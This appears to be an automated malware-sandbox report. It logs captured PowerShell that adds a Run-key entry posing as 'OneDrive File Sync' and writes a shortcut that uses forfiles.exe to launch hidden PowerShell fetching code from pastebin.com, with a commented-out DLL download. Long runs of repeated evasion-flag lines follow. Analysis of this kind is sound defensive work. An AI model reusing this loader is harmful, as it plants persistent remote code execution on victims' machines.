Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFE16710221 push eax; ret 12_2_00007FFE16710222

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $currentPath + ";$env:tmp"[System.Environment]::SetEnvironmentVariable("PATH", $newPath, "User")#New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "Driver Diagnosis" -Value "regsvr32.exe /s DriverDiag" -PropertyType String -ForceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Force#$source = "https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll"#$destination = "$env:tmp\DriverDiag.dll"#Invoke-WebRequest -Uri $source -OutFile $destinationmkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
